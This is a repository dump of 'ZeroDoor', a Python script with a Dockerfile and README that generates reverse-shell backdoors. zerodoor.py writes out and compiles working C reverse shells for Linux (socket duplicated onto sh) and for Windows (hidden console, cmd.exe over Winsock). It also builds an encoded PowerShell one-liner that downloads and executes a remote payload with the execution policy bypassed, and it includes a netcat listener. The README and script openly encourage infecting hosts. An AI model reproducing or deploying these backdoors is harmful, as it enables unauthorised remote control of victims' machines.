├── .gitignore ├── Docker ├── Dockerfile └── start.sh ├── LICENSE ├── README.md └── zerodoor.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | -------------------------------------------------------------------------------- /Docker/Dockerfile: -------------------------------------------------------------------------------- 1 | # ZeroDoor 2 | # Cross-Platform Backdoors Generator 3 | # https://github.com/Souhardya/Zerodoor 4 | # docker build -t zeroDoor . 5 | FROM ubuntu:16.04 6 | 7 | RUN \ 8 | apt update && \ 9 | apt install -y python-pip git-core && \ 10 | cd /opt 11 | 12 | RUN git clone https://github.com/Souhardya/Zerodoor 13 | 14 | COPY start.sh /start.sh 15 | 16 | RUN \ 17 | apt remove -y git-core && \ 18 | apt clean && \ 19 | apt autoremove -y && \ 20 | chmod 775 /start.sh 21 | 22 | ENTRYPOINT ["/start.sh"] 23 | 24 | -------------------------------------------------------------------------------- /Docker/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cd /opt/Zerodoor 3 | python zerodoor.py 4 | 5 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Souhardya Sardar 4 | If you want to copy please fork it or simply give credits 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZeroDoor 2 | 3 | A script written lazily for generating reverse shell backdoors on the go whenever you need without any hassle for your daily penetration needs . 4 | These backdoors are not james bond high tech stuff but rather simple ones to prevent over exploitation and limited capabilities 5 | Once you generate the payload somehow execute on the conecrened system eithe Win or nix based systems . 6 | Once executed you will have the capability of executing remote commands on the compromised host :) 7 | Happy Hacking :D 8 | 9 | ![Alt text](http://oi68.tinypic.com/vo5s29.jpg "Screenshot") 10 | 11 | # Usage 12 | ``` 13 | python zerodoor.py 14 | 15 | ``` 16 | 17 | # Tiny Overview 18 | 19 | Nothing special it includes three basic backdoor generation capability for :- 20 | 21 | 1. Nix Based 22 | 2. Windows ( Normal executable / PowerShell One Liner / JavaScript Backdoor ) 23 | 24 | Poweshell payload generation have been added due to its sofistication and presistence :) 25 | 26 | # Hot Updates ? 27 | 28 | Added docker suppport 29 | JS support 30 | 31 | # Author 32 | 33 | Souhardya Sardar is a lazy guy who keeps learning and gets trolled by experts 34 | Github :- github.com/Souhardya 35 | 36 | # Donate and contact :3 37 | 38 | If you want to do any python based project with me please kindly mail me at Souhardya@protonmail.com 39 | Or reach me on facebook :- facebook.com/SouhardyaSardar.py 40 | 41 | If you like my code :3 buy me a beer 42 | 43 | Bitcoin Address :- 1EyfivBCpdxKonG9imh8Mib3Bgeuy8cV8F 44 | 45 | 46 | # Open Source 47 | 48 | Redistribute and Modify without any restrictions :) 49 | 50 | If you encounter any problems regarding the code please open 51 | a issue at my repository and I will try to fix it as 52 | soon as possible . Maybe later cuz I am hell lazy 53 | 54 | 55 | # Illegal Usage is not allowed !! 56 | 57 | # Python2 Support only :) 58 | 59 | You can help me implement a python3 version too 60 | -------------------------------------------------------------------------------- /zerodoor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import os 5 | import sys 6 | import socket 7 | 8 | if sys.version_info > (3, 0): 9 | raw_input = input 10 | 11 | def main(): 12 | print (""" 13 | _____________________________________________________________ 14 | | ^^^^^^^^\ | 15 | | | | | 16 | | * ZeroDoor Backdoor Generator * |_ __ | | 17 | | (.(. ) | | 18 | | ~ Created By Souhardya Sardar ~ _ (_ ) 19 | | Happy Hacking to all :) \\ /___/' / 20 | | _\\_ \ | | 21 | | (( ) /====| | 22 | | \ <.__._- \ | 23 | |___________________________________________ wget backdoors | | | | | | 68 | | | chmod +x backdoors | | |/----|`---= | | 69 | | | ./backdoors pwn | | | |==== ooo | ; 70 | | | | | | |(((( [33]| ," 71 | | `--------------------' |," | |(((( | ," 72 | +-----------------------+ ;; | | |," 73 | /_)______________(_/ //' +.---------+ 74 | ___________________________/___ 75 | / oooooooooooooooo .o. oooo /, 76 | / ==ooooooooooooooo==.o. ooo= // 77 | /_==__==========__==_ooo__ooo=_/' 78 | `-----------------------------' 79 | 80 | ~ 3 Immersive Backdoors ~ 81 | 82 | 83 | 1. Linux Backdoor Generate 84 | 2. Windows Generic Backdoor 85 | 3. Powershell Liner Backdoor 86 | 87 | 88 | 89 | 90 | """) 91 | 92 | select = raw_input( "Select from the following options ") 93 | 94 | if(select == '1'): 95 | print (""" 96 | 97 | 98 | ██╗ ██╗███╗ ██╗██╗ ██╗██╗ ██╗ ██████╗ █████╗ ██████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██████╗ 99 | ██║ ██║████╗ ██║██║ ██║╚██╗██╔╝ ██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗ 100 | ██║ ██║██╔██╗ ██║██║ ██║ ╚███╔╝ ██████╔╝███████║██║ █████╔╝ ██║ ██║██║ ██║██║ ██║██████╔╝ 101 | ██║ ██║██║╚██╗██║██║ ██║ ██╔██╗ ██╔══██╗██╔══██║██║ ██╔═██╗ ██║ ██║██║ ██║██║ ██║██╔══██╗ 102 | ███████╗██║██║ ╚████║╚██████╔╝██╔╝ ██╗ ██████╔╝██║ ██║╚██████╗██║ ██╗██████╔╝╚██████╔╝╚██████╔╝██║ ██║ 103 | ╚══════╝╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ 104 | 105 | 106 | ~ Linux Reverse Shell Gen ~ 107 | """) 108 | 109 | host = raw_input("[?] Enter your IP (LHOST): " ) 110 | port = raw_input("[?] Enter your port (LPORT): ") 111 | linux_shell(host, port) 112 | os.system("gcc .shell.c -o backdoor -pthread && rm -rf .shell.c") 113 | print ("[*] Backdoor Generated now go infect lol ...[*]") 114 | 115 | if(select == '2'): 116 | print (""" 117 | 118 | 119 | 120 | ██╗ ██╗██╗███╗ ██╗ ██████╗ █████╗ ██████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██████╗ 121 | ██║ ██║██║████╗ ██║ ██╔══██╗██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗ 122 | ██║ █╗ ██║██║██╔██╗ ██║ ██████╔╝███████║██║ █████╔╝ ██║ ██║██║ ██║██║ ██║██████╔╝ 123 | ██║███╗██║██║██║╚██╗██║ ██╔══██╗██╔══██║██║ ██╔═██╗ ██║ ██║██║ ██║██║ ██║██╔══██╗ 124 | ╚███╔███╔╝██║██║ ╚████║ ██████╔╝██║ ██║╚██████╗██║ ██╗██████╔╝╚██████╔╝╚██████╔╝██║ ██║ 125 | ╚══╝╚══╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ 126 | 127 | ~ Windows Reverse Shell Gen ~ 128 | 129 | """) 130 | 131 | host = raw_input( "[?] Enter your IP (LHOST): " ) 132 | port = raw_input("[?] Enter your port (LPORT):" ) 133 | windows_reverse(host, port) 134 | os.system("/usr/bin/i686-w64-mingw32-gcc winshell.c -o backdoor.exe -lws2_32 && rm -rf winshell.c") 135 | print ("[*] Backdoor Generated now go infect lol ...[*]") 136 | 137 | if(select == '3'): 138 | print (""" 139 | 140 | ██████╗ ██████╗ ██╗ ██╗███████╗██████╗ ██████╗ ██████╗ ██████╗ ██████╗ 141 | ██╔══██╗██╔═══██╗██║ ██║██╔════╝██╔══██╗██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗ 142 | ██████╔╝██║ ██║██║ █╗ ██║█████╗ ██████╔╝██║ ██║██║ ██║██║ ██║██████╔╝ 143 | ██╔═══╝ ██║ ██║██║███╗██║██╔══╝ ██╔══██╗██║ ██║██║ ██║██║ ██║██╔══██╗ 144 | ██║ ╚██████╔╝╚███╔███╔╝███████╗██║ ██║██████╔╝╚██████╔╝╚██████╔╝██║ ██║ 145 | ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ 146 | 147 | ~ Base64 Encoded Powershell Backdoor gen ~ 148 | (Mostly Undetectable) 149 | 150 | """) 151 | 152 | powershell_payload() 153 | 154 | 155 | 156 | 157 | 158 | 159 | def linux_shell(host, port): 160 | print ("[*] Starting Process.. [*]") 161 | with open(".shell.c", "w") as file: 162 | file.write(''' 163 | 164 | #include 165 | #include 166 | #include 167 | #include 168 | 169 | int main (int argc, char **argv) 170 | { 171 | int scktd; 172 | struct sockaddr_in client; 173 | 174 | client.sin_family = AF_INET; 175 | client.sin_addr.s_addr = inet_addr("%s"); 176 | client.sin_port = htons(%s); 177 | 178 | scktd = socket(AF_INET,SOCK_STREAM,0); 179 | connect(scktd,(struct sockaddr *)&client,sizeof(client)); 180 | 181 | dup2(scktd,0); // STDIN 182 | dup2(scktd,1); // STDOUT 183 | dup2(scktd,2); // STDERR 184 | 185 | execl("/bin/sh","sh","-i",NULL,NULL); 186 | 187 | return 0; 188 | } 189 | ''' % (host, port)) 190 | 191 | 192 | 193 | 194 | #Credits to BlackBox Hacker ( Xabber Lord ) he wrote this a whole back years ago ..... people copied it without giving credits 195 | #Permission taken and thanked too :) 196 | def windows_reverse(host, port): 197 | with open("winshell.c", "w") as file: 198 | file.write(''' 199 | #include 200 | #include 201 | #define _WINSOCK_DEPRECATED_NO_WARNINGS 202 | #pragma comment(lib,"ws2_32") 203 | WSADATA wsaData; 204 | SOCKET Winsock; 205 | SOCKET Sock; 206 | struct sockaddr_in hax; 207 | char ip_addr[16]; 208 | STARTUPINFO ini_processo; 209 | PROCESS_INFORMATION processo_info; 210 | //int main(int argc, char *argv[]) 211 | int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdParam, int iCmdShow) 212 | { 213 | FreeConsole(); 214 | WSAStartup(MAKEWORD(2,2), &wsaData); 215 | Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); 216 | 217 | struct hostent *host; 218 | host = gethostbyname("'''+host+'''"); 219 | strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); 220 | hax.sin_family = AF_INET; 221 | hax.sin_port = htons(atoi("'''+port+'''")); 222 | hax.sin_addr.s_addr = inet_addr(ip_addr); 223 | WSAConnect(Winsock,(SOCKADDR*)&hax,sizeof(hax),NULL,NULL,NULL,NULL); 224 | memset(&ini_processo,0,sizeof(ini_processo)); 225 | ini_processo.cb=sizeof(ini_processo); 226 | ini_processo.dwFlags=STARTF_USESTDHANDLES; 227 | ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; 228 | CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,CREATE_NO_WINDOW,NULL,NULL,&ini_processo,&processo_info); 229 | } 230 | ''') 231 | 232 | 233 | 234 | def powershell_payload(): # Powershell payload creation 235 | 236 | payload = (""" 237 | 238 | #!/bin/bash 239 | 240 | 241 | echo "Set LHOST: \c" 242 | read ip 243 | 244 | echo "Specify payload name hosted on your web server : \c" 245 | read payload 246 | 247 | scriptblock="iex (New-Object Net.WebClient).DownloadString("http://$ip/$payload")" 248 | 249 | encode="`echo $scriptblock `" 250 | 251 | command="cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc $encode" 252 | 253 | echo $command 254 | 255 | 256 | """) 257 | 258 | os.system(payload) 259 | 260 | 261 | def banner(): 262 | print (""" 263 | 264 | _______________ |*\_/*|________ 265 | | ___________ | ||_/-\_|______ | 266 | | | | | | | | | 267 | | | 0 0 | | | | 0 0 | | 268 | | | - | |-> -> ->| | - | | 269 | | | \___/ | | | | \___/ | | 270 | | |___ ___| | | |___________| | 271 | |_____|\_/|_____| |_______________| 272 | _|__|/ \|_|_.............._|________|_ 273 | / ********** \ / ********** \ 274 | ************ \ / ************ \ 275 | 276 | ~ A Simple Listener To Accept Connections From Compromised Hosts ~ 277 | 278 | 279 | """) 280 | 281 | def listener(): 282 | 283 | try: 284 | port = int(raw_input("Specify port to interact:")) 285 | os.system("nc -l %s" %port) 286 | 287 | except: 288 | print ("[*] Listener could not be initiated [*]") 289 | 290 | 291 | 292 | if __name__ == '__main__': 293 | main() 294 | --------------------------------------------------------------------------------